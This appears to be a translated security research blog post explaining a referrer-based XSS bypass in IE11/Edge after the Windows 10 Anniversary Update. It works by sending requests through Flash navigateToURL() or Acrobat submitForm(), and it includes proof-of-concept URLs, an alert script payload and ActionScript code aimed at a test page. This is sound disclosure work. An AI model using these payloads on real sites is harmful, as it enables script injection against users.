XSS via Referrer After Anniversary Update

自Windows 10周年更新以来，微软似乎修复了IE11/Edge上的一些XSS技巧。Referrer行为就是其中之一。

以下页面直接写入HTTP_REFERER和document.referrer： https://vulnerabledoma.in/xss_referrer

之前，IE/Edge没有对Referrer字符串中的"<>字符进行编码。因此，我们可以通过以下PoC在该页面上实现XSS： https://l0.cm/xss_referrer_oldpoc.html?

但自从Windows 10周年更新后，IE11/Edge对其进行了编码。您将从该页面获得以下编码字符串：

HTTP_REFERER: https://l0.cm/xss_referrer_oldpoc.html?%3Cscript%3Ealert(%221%22)%3C/script%3E document.referrer: https://l0.cm/xss_referrer_oldpoc.html?%3Cscript%3Ealert(%221%22)%3C/script%3E 太糟糕了！ 当然，我们仍然可以使用Win8.1/7的IE11。但我们也想在Win10上实现XSS，不是吗？:D

今天，我想介绍一个小技巧，即在最新的Win10 Edge/IE11上使用Referrer实现XSS。

该技术非常简单。如果您通过Flash的navigateToURL()方法发送请求，可以轻松地将"<>字符串包含在Referrer中，如下所示：

https://l0.cm/xss_referrer.swf?

ActionScript代码如下：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

package {
 import flash.display.Sprite;
 import flash.net.URLRequest;
 import flash.net.navigateToURL;
 public class xss_referrer extends Sprite{
  public function xss_referrer() {
   var url:URLRequest = new URLRequest("https://vulnerabledoma.in/xss_referrer");
   navigateToURL(url, "_self");
  }
 }
}

从访问结果可以看出，我们可以通过Referer请求头实现XSS。但遗憾的是，我们无法通过document.referrer属性实现XSS，因为它变为空。哎呀 :p

仅供参考，我还可以通过Acrobat API的JavaScript的submitForm()方法重现此问题。

我在带有Adobe Reader插件的Win10 IE11上确认了这一点。

PoC如下： https://l0.cm/xss_referrer.pdf?

似乎通过插件的请求未被考虑。

就是这样。在某些情况下可能会有所帮助 :) 谢谢！